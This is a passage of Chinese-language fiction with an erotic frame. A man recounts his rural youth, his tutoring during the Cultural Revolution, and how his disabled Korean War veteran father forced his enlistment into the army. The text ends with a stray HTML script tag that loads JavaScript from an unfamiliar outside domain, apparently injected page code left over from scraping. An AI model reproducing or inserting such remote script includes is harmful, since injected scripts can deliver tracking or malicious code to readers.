  我爹娘虽然没什幺文化,但是对文化人却有着一种近乎崇拜的信任,于是毫
不犹豫的答应了。
  从此,在文革初期最混乱的那几年,我们兄妹几人却在马老师的辅导下学了
不少东西,我学到高中的代数几何物理化学,甚至还学过英语,当时认识三千多
个单词,在今天看来不算什幺,但是在当时绝对是奇迹。
  后来1970年前后,提出了复课闹革命的口号,学生纷纷回到学校继续上课,
我这时候也上了初中,由于我原本学习成绩就不错,加上马老师辅导了我两年多,
所以我毫无悬念的成为了我们乡中学的第一名。
  那时候我认识了一个姑娘,叫小云,她家住在我们乡里另一个村子,是班上
的文艺委员,人长得漂亮,性格也好。
  我当时是班长,平时与她交流就多一些,而且我家放学回家顺路,那时候农
村没有路灯,冬天天黑的早,经常是我把她先送回家我再回家。一来二去,我俩
就有了些感情,但是谁也没有道破。」
  马总讲的口干舌燥,喝了一口水,把我妈搂紧了,接着说:「转眼间,我初
中毕业了,按照父亲的计划,我该去当兵了。
  在那个时候的农村,当兵是最好的出路,于是大家都挤破头。
  那年全乡一共有20个入伍名额,初审体检我都是名列第一,结果最后乡里公
布名单的时候却没有我。
  我爹一听就怒了,不一会马老师赶到我家,告诉我爹我的名额被公社党委书
记的儿子给顶了。
  我爹当即二话不说,拉着我就直奔县城,下午到了县城,我爹带我直接进了
县武装部,推开一间办公室,正好看见一屋子穿军装的正在开会,后来才知道是
武装部的人和部队的接兵干部正在核定最后的征兵名单。
  我爹进去给大家吓了一跳,我爹当场质问武装部部长:『部队是不是要招录
优秀青年入伍?』武装部部长知道我爹不好惹,只好回答『是!』我爹接着问:
『那为什幺不要我家马援朝?』武装部部长知道个中缘由,于是咬着牙根说:
『他不符合条件!』我爹一把推开了武装部部长,对着前来接兵的部队干部说:
『各位首长, 3我想让你们评判一下我儿子够不够征兵标准,论文化水平,我儿
子是初中毕业,而且多少年的全乡第一,论身体素质我儿子从小就练武,十里八
乡没几个后生打得过他,论军事素质,我儿子是基干民兵排长,徒手五公里18分
钟,五六半自动一百米距离上能打断报靶杆,手榴弹投掷距离五十三米,格斗训
练时候放倒过教官,这样的人够不够入伍标准!?我也知道,现在很多人家为了
让孩子当兵,都给领导送东西,我没啥可送的,就送这些够不够?』说着,我爹
从怀里掏出了他的《伤残军人证》和好几个军功章,啪的一声摔在桌子上。我爹
接着脱掉了上衣,指着身上的伤疤说:『还有这个!』紧接着我爹又伸手摘下了
自己的假眼,托在手里,对全场人说:『还有这个,够不够,只能送假的了,真
的那只,1952年被我扔在朝鲜战场了!』」我爹这一番话说完,全场都变得鸦雀
无声。
  最后,一位和我爹年纪差不多的军官走了过来,对我爹说:「同志,我也参
加过抗美援朝。」
  说着撩起衣服,给我爹看了他肚子上的一道伤疤,然后对我爹说:『上甘岭
留下的!』接着又说:『那我就考验一下你儿子的军事素质,如果真像你说的那
幺好,我就要了!』「马总又抱了抱我妈赤裸的身体接着说:「随后,那个军官
又叫出了一名和我年纪差不多的战士,让我和他摔一跤比试一下,我上去和这个
战士打了几个照面,就知道这名战士身体素质很好,特别是力量绝对在我之上,
但是格斗技术远不如我。
  但是我却心有忌惮,不敢出手摔他。我爹看出了我的顾忌,就用手指着身边
那个军官大声对我喊:『小子,怕个球,你爹我要是留在部队,官比他还大,摔
他!』听了我爹的话,我一咬牙,上前一个别子把那个战士扔出了两三米。」
  我妈靠在马总的肩膀上,认真的听着马总的故事,眼睛里竟然泛着泪光。
  「这时,我父亲身边的那个中年军官首先鼓起掌来,对我爹和武装部长说:
『这个兵,我要了。』」* type="text/javascript" src="https://adapzs6nul.com/883260b2a01fbab62">